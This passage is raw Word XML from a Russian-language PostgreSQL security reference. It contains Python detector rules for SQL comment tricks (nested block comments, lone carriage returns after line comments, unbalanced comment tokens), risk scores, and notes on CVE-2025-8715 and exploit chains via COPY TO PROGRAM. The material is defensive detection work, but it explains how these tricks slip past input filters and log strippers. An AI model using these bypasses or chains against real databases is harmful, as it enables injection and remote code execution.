          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "большинство sanitizer-ов и log-стрипперов non-nested. "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "Паттерн — обход input-фильтра. См. 3.12.1.",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="В application-runtime nested comments крайне редки. "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "Если payload пришёл из user-input — заблокировать на "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "уровне WAF AST-валидатором.",</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_RE["comment_cr_only"].search(sql):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vulnerability_class=VulnerabilityClass.COMMENT_EDGE_CASE,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=8,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Одиночный \\r после --комментария. PG обрывает "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "однострочный комментарий на \\r или \\n независимо; "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "sanitizer, нормализующий только \\n, пропускает \\r. "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "Паттерн — обход input-фильтра. См. 3.12.2.",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Нормализуйте line-endings ДО SQL-builder: "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "value = value.replace('\\r\\n', '\\n').replace('\\r', '\\n').",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if _RE["comment_unbalanced_block"].search(sql):</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vulnerability_class=VulnerabilityClass.COMMENT_EDGE_CASE,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=6,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="≥3 опен или клоуз block-comment-tokens — структура, "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "которая часто индикатор обхода log-стрипперов или "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "несбалансированной попытки вложения. См. 3.12.1.",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="В runtime-генерируемом SQL такой паттерн почти "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "никогда не легитимен; проверьте источник payload.",</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Градация risk:</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comment_nested</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Nested comments в runtime-SQL почти всегда обход фильтра; legitimate use cases редки.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comment_cr_only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Одиночный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почти никогда не legitimate; индикатор byte-level encoding bypass.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comment_unbalanced_block</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. False-positive-rate выше (могут возникать в legitimate auto-generated SQL); маркер только в комбинации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.12.3 (R25) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не покрывается серверным rules.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, потому что:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Sanitizer работает на runtime-SQL приложения, не на pg_dump output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Setup-команды (CREATE ROLE/TABLE с newline) проходят через rules.py как обычный DDL (правильно — это валидный SQL).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Активация (psql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происходит на стороне DBA, не приложения.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Обнаружение R25 — отдельная процедура </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">inventory-уровня</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не SQL-pattern-уровня. См. queries в Саммари (выше) для разовой проверки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pg_description</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R25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2025-8715: PostgreSQL advisory, GBHackers коverage, контекст регрессии CVE-2012-0868. Применимо только к 3.12.3.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Docs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Lexical Structure §4.1.1 (Identifiers), §4.1.5 (Comments) — спецификация для всех трёх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source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src/backend/parser/scan.l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (states </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для block-comments, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xqs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для line-comments) — реализация nested и CR/LF handling.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SQL standard SQL:2008 §5.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст line-terminator-семантики.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Общие</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — PortSwigger SQLi cheat sheet (filter bypass через comment-tricks), HackTricks PostgreSQL Injection.</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3.12.2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комбо для обхода input-фильтра + multi-statement. В extended-protocol заблокировано на сервере; в simple-protocol проходит.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FROM/TO PROGRAM)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — server-side counterpart к 3.12.3 RCE-каналу.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(Filter bypass)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.9.6 (whitespace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3.12.1 (nested </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/* /* */ */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — close родственники; граница закреплена в conventions.md.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3.9.7 (CVE-2025-1094)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — другой client-side bug; chain-ятся через psql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(3.12.3 + 3.9.7 — двойной client-side compromise pathway).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 (Privilege escalation)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.12.3 setup может требовать privileged operations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 путь к ним — через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server-side counterpart 3.12.3.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 — полный разбор CVE-2025-8715: timeline, exact mechanism, full chain, managed-провайдеры.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4.7 (Цепочки)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2025-8715 + COPY TO PROGRAM (R3) или + CVE-2025-1094 (R6) — двух-/трёх-ступенчатые exploits.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5.5 (Конфиги PostgreSQL)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — рекомендации по audit-логированию событий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TABLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с byte-level inspection имени.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Managed-провайдеры</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.12.1 и 3.12.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">application-layer фильтрацию</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (sanitizer, WAF). Managed-PG не предоставляет input-WAF (см. summary-3.9 раздел про managed); приёмы работают идентично self-hosted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.12.3 (R25)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — более интересная картина по провайдерам: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AWS RDS / Aurora</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: pg_dump-операции через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">aws rds export-cluster-to-s3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> использует pg_dump --format=plain → psql restore. Если backup-restore-pipeline через managed-mechanism — patch-state RDS зависит от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">maintenance window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
